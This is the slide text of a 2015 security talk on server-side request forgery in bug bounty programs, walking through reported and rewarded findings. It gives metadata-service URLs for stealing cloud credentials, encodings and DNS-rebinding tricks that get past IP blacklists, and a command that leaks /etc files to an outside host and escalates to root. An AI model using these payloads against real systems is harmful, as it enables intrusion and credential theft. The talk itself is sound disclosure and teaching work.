Agarri Offensive security Server-side browsing considered harmful 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Methodology  Identify server-side browsing   Identify protections (mostly blacklists)   Then bypass them Try to maximize impact during exploitation   Ideally with responses echoed back Prefer RCE or Cloud pwnage to port scan Aka "creatively express my laziness" 05/21/2015 Nicolas Grégoire Scope  Covers only a few bug bounty programs   Facebook, Yahoo, CoinBase, PayPal, ... Criteria  Interesting targets  Good security team  Fast reaction  Nice payouts 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Vectors    Resources for developers  API explorer (Adobe Omniture - @riyazwalikar)  Debug of IPN aka Webhooks (payment world) Third-party data sources  Upload from URL (Dropbox, FastMail, …)  Import of RSS feeds (YQL, Yandex, …) Third-party authentication  OAuth, SAML, … (used everywhere) 05/21/2015 Nicolas Grégoire Vectors  Core features of the target application    Google Translate can work from an URL  Prezi "Export to portable format" Mixed-content proxies  Hopscotch (FastMail), Camo (Github)  And also "imageproxy", "pilbox", ... Hosted code  Parse will execute your own JS code (YQL too!) 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire URL handlers   file:// is an easy win  May be reached via a HTTP redirect  Java trick: file:///proc/self/cwd/../config/ Exotic handlers  gopher://, dict://, php://, jar://, tftp://, …  Look at the "SSRF Bible" if interested 05/21/2015 Nicolas Grégoire URL handlers  http:// et https:// are always available   Let's focus on these ones! Lots of possible targets  HTTP and HTTPS applications  Compatible services like Redis  Fingerprintable services  05/21/2015 SMTP, SSH, ... Nicolas Grégoire Destinations   Main goals  Loopback  Multicast Secondary goals 05/21/2015  Internal network aka LAN  Public IP space Nicolas Grégoire Loopback  Often hosts sensitive services    IP-based ACL bypassed by design Monitoring  Custom: Yahoo "ymon"  Open Source: Consul, Monit, ... Data repositories  05/21/2015 Solr, Redis, memcached, ... Nicolas Grégoire Loopback  Depending on the architecture  Loopback may not be the backend 05/21/2015  But an outbound proxy  Shared? With who? In scope?  CoinBase & Proximo Nicolas Grégoire The loopback idiosyncrasy   Symptoms  Scanning using different features  Getting different results Probable causes  Partial proxying (YQL)  Specialized backends 05/21/2015 Nicolas Grégoire Multicast  Works for every EC2 or OpenStack VM   Meta-data server at http://169.254.169.254/ Interesting targets  Always here   User data (startup script for auto-scaling)   /latest/meta-data/{hostname,public-ipv4,...} /latest/user-data Temporary AWS credentials  05/21/2015 /latest/meta-data/iam/security-credentials/ Nicolas Grégoire Internal network  Most of the time, there's a LAN   Except for some Cloud-only setups With non hardened services  Monitoring, stats, ...  Databases, keystores, ...  But you need the addressing plan  Btw, are you sure 10/8 is in scope? 05/21/2015 Nicolas Grégoire Public IP space   Sometimes...  Public ACL != internal ACL  Private services on public IP Not so uncommon...  noc.parse.com => 54.85.239.3  05/21/2015 Hosting a Go debugger Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Blacklists  Only a few destinations to forbid  So implementing blacklists is easy   Or not? Let's focus on 05/21/2015  http://169.254.169.254/  http://127.0.0.1/ Nicolas Grégoire Blacklists – DNS  http://metadata.nicob.net/   http://169.254.169.254.xip.io/   Free wildcard DNS service http://1ynrnhl.xip.io/   Simple static A record Encoded as base36(int('254.169.254.169')) http://www.owasp.org.1ynrnhl.xip.io/  05/21/2015 If both whitelists and blacklists are used Nicolas Grégoire Blacklists – HTTP redirects  Redirect to the meta-data server   Static way   HTTP 302 to http://169.154.169.254/ http://nicob.net/redir6a Dynamic way  http://nicob.net/redir-http-169.254.169.254:80- 05/21/2015 Nicolas Grégoire Blacklists – HTTP redirects  Redirects work IRL   There's more than 302   Like 307 for POST to POST Test with a (multi-step) loop   Yahoo and Stripe were affected May produce some distinctive errors Points to a redirect URL via the UI/API  05/21/2015 Then make dynamic changes on your side Nicolas Grégoire Blacklists – Alternate IP encoding   Most common representation  Dotted decimal  127.0.0.1, 169.254.169.254, ... But any HTTP client supports more  Browser, proxy, library, …  http://www.pc-help.org/obscure.htm 05/21/2015 Nicolas Grégoire Blacklists – Alternate IP encoding http://425.510.425.510/ Dotted decimal with overflow http://2852039166/ Dotless decimal http://7147006462/ Dotless decimal with overflow http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ 05/21/2015 Dotted octal with padding Nicolas Grégoire Blacklists – Alternate IP encoding   And you can mix them  http://425.254.0xa9.0376/  Decimal (w/ and w/o) overflow + hex + octal Or convert only parts of the address  http://0251.0xfe.43518/  Octal + hex + 2-byte wide dotless decimal 05/21/2015 Nicolas Grégoire Blacklists – IPv6  http://[::169.254.169.254]/   IPv4-compatible address http://[::ffff:169.254.169.254]/  05/21/2015 IPv4-mapped address Nicolas Grégoire Blacklists – loopback only  http://127.127.127.127/   http://0.0.0.0/   Yes, it's a /8 Works surprisingly often... http://[::1]/ and http://[::]/  Moar IPv6 05/21/2015 Nicolas Grégoire Blacklists – DNS TOCTOU    Step 1  The backend server resolves the destination hostname  The backend server verifies the IP against a blacklist  The request is allowed to go to the outbound proxy Step 2  The proxy resolves the destination hostname  The response now points to a private IP address Toolbox  Dedicated sub-domain  Patched copy of DNSChef 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire Unused feature – Stripe  https://checkout.stripe.com/v3/checkout/desktop.js  Containing a (never called) Ajax function  Taking only one parameter named "image_url" $.ajax({ url: "https://checkout-api.stripe.com/color", data: { image_url: uri }, type: "GET", dataType: "json" }) 05/21/2015 Nicolas Grégoire Unused feature – Stripe   Client-side blacklist  Not a security measure  Includes 127.0.0.0/24 Server-side blacklist   Loopback, internal, multicast, ... But HTTP redirects are honored 05/21/2015 Nicolas Grégoire Unused feature – Stripe Reward: $500 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire Hidden vector – Prezi  Base64-encoded zipped XML document . 05/21/2015 Nicolas Grégoire Hidden vector – Prezi Easier to manage with a custom Burp extension . 05/21/2015 Nicolas Grégoire Hidden vector – Prezi Each embedded object is referred by its URL . 05/21/2015 Nicolas Grégoire Hidden vector – Prezi   Looking for some server-side processing  Feature "Export to PDF" => no  Feature "Export to ZIP" => yes Exploits  file:///etc/passwd ($2k)  http://169.254.169.254/ ($2k)  http://0177.0.0.1/ (IPy bypass, $500) 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire IPN – PayPal  IPN testing interface for developers  Existing blacklist    Bypassed with octal encoding Exploit  https://012.0110.0150.0036/  IPN sent successfully to 10.72.104.30 Reward: $100 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire IPN – John Doe I  Webhooks testing interface for developers  No restriction on the destination  Exploit   First fix bypassed   http://127.0.0.1:8500/v1/agent/self Using http://0.0.0.0:61315/ Reward: $750 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire IPN – CoinBase  Callbacks testing interface for developers  No restriction on the destination  Exploit  http://169.254.169.254/latest/user-data   In fact, I pwned Proximo   Credentials for EC2, Heroku, ... Paid shared outbound proxy Reward: $5k (time to fix+reward < 24h, kudos!) 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire Mixed-content proxy – John Doe II  Links to external images from SSL pages  The perfect SSRF vector    Any method, any header, full response Exploit (root RCE)  https://xxx/http://0.0.0.0:8500/v1/agent/check/register  https://xxx/http://0.0.0.0:8500/v1/agent/checks Reward: $3k 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire The YMON saga – Part 1  YQL (and Pipes) can access external systems  Existing blacklist (IP address + port)  Applied before following HTTP redirects . 05/21/2015 Nicolas Grégoire The YMON saga – Part 1  Closed as WONTFIX “Thank you for your submission to Yahoo! We are aware of this functionality on our site and it is working as designed. Please continue to send us vulnerability reports!”  Reward: $0 05/21/2015 Nicolas Grégoire The YMON saga – Part 2   Port TCP/9466  405 Method Not Allowed  WS using the ymon namespace Google for "ymon wsdl"  05/21/2015 Found ONE question from 2005 Nicolas Grégoire The YMON saga – Part 2 05/21/2015 Nicolas Grégoire The YMON saga – Part 2 05/21/2015 Nicolas Grégoire The YMON saga – Part 2   WSDL analysis  450 lines, 11 methods  Including echo, exec, ping, version, ... The exec() method  Looks sooooo interesting  But limited to some Nagios plugins 05/21/2015 Nicolas Grégoire The YMON saga – Part 2  Abuse the check_log plugin to leak files   Abuse the check_log plugin to make a copy of bash   check_log -F /etc/* -O /dev/tcp/1.2.3.4/3333 -q '' check_log -F /bin/bash -O /home/y/libexec/nagios/check_nt -q '' Then execute bash with root privileges  check_nt -c 'id;uname -a' 05/21/2015 Nicolas Grégoire The YMON saga – Part 2  Reward: $15k 05/21/2015 Nicolas Grégoire The YMON saga – Part 3    Hex encoding used to bypass both the IP and port checks  Access (again) the "ymon" WS on loopback  Execute code as "y" and not "root" anymore Need to find something new  Identify some (unpatched) "ymon" master servers  Pwn them like previously Fix for the IP check bypassed using octal encoding   Yes, that's the third bypass! Reward: $6,600 05/21/2015 Nicolas Grégoire Agarri Offensive security 05/21/2015 Nicolas Grégoire SSJS – Parse  Language: JavaScript  Two offers  "Cloud Code"   "Parse Hosting"   Authenticated calls only Complex MVC applications Outbound requests are allowed  Through a farm of dedicated proxies 05/21/2015 Nicolas Grégoire SSJS – Parse  Private and multicast addresses are filtered  No restriction on loopback   Access to Monit through a proxying app Internal services running on public IP space  Access to a Redis DB on "noc.parse.com"  Note: external ACL are OK 05/21/2015 Nicolas Grégoire SSJS – Parse 05/21/2015 Nicolas Grégoire SSJS – Parse 05/21/2015 Nicolas Grégoire SSJS – Parse  Internal services found on public IP  Ganglia, Monit, Nagios  Redis, MySQL  Go debugger for /usr/bin/shovel  But no RCE...  Reward: $20k 05/21/2015 Nicolas Grégoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 05/21/2015 Nicolas Grégoire Toolbox  Script generating obfuscated IP addresses  Public dynamic endpoint for HTTP(S) redirects    SSL certs are nearly never verified Web "bins"  http://httpbin.org/ (tons of options)  http://requestb.in/ (useful for blind requests) List of default ports used by internal and loopback services 05/21/2015 Nicolas Grégoire Toolbox    Burp Suite "search" feature  Basic criteria: "=http" and "url="  Will miss REST and XML parameters Dedicated DNS sub-domain  NS record pointing to a controlled server  Used for detection (now in Burp Suite) and blacklist evasion Patched copy of DNSChef  Takes multiple IP addresses and a resolution scheme 05/21/2015 Nicolas Grégoire Toolbox root# ./rebind.py --ip1=169.254.169.254 –ip2= --scheme=212 --interface= [*] DNS Rebinder started on interface: [23:51:46] xxx.yyy.162.36: cooking the response of type 'A' for xxx.dyn-dom.tld to [1] [23:51:46] xxx.yyy.165.239: cooking the response of type 'A' for xxx.dyn-dom.tld to 169.254.169.254 [2] [23:51:49] xxx.yyy.167.12: cooking the response of type 'A' for xxx.dyn-dom.tld to [3] [23:53:13] xxx.yyy.162.36: cooking the response of type 'A' for xxx.dyn-dom.tld to [1] 05/21/2015 Nicolas Grégoire Toolbox   Dynamic HTTP redirects  Easy to use with Burp Intruder  Using a basic RewriteRule Source   ^redir-([^/-]*)-([^/-]*)-(.*)$ Destination  05/21/2015 $1://$2/$3 [L] Nicolas Grégoire Agarri Offensive security The end... 05/21/2015 Nicolas Grégoire Conclusion   Attackers  Weird machines  Primitives, exploit chains, ... Defenders  If you only need Internet resources   05/21/2015 Put your endpoint outside! And good luck! Nicolas Grégoire Agarri Offensive security The end... 05/21/2015 Nicolas Grégoire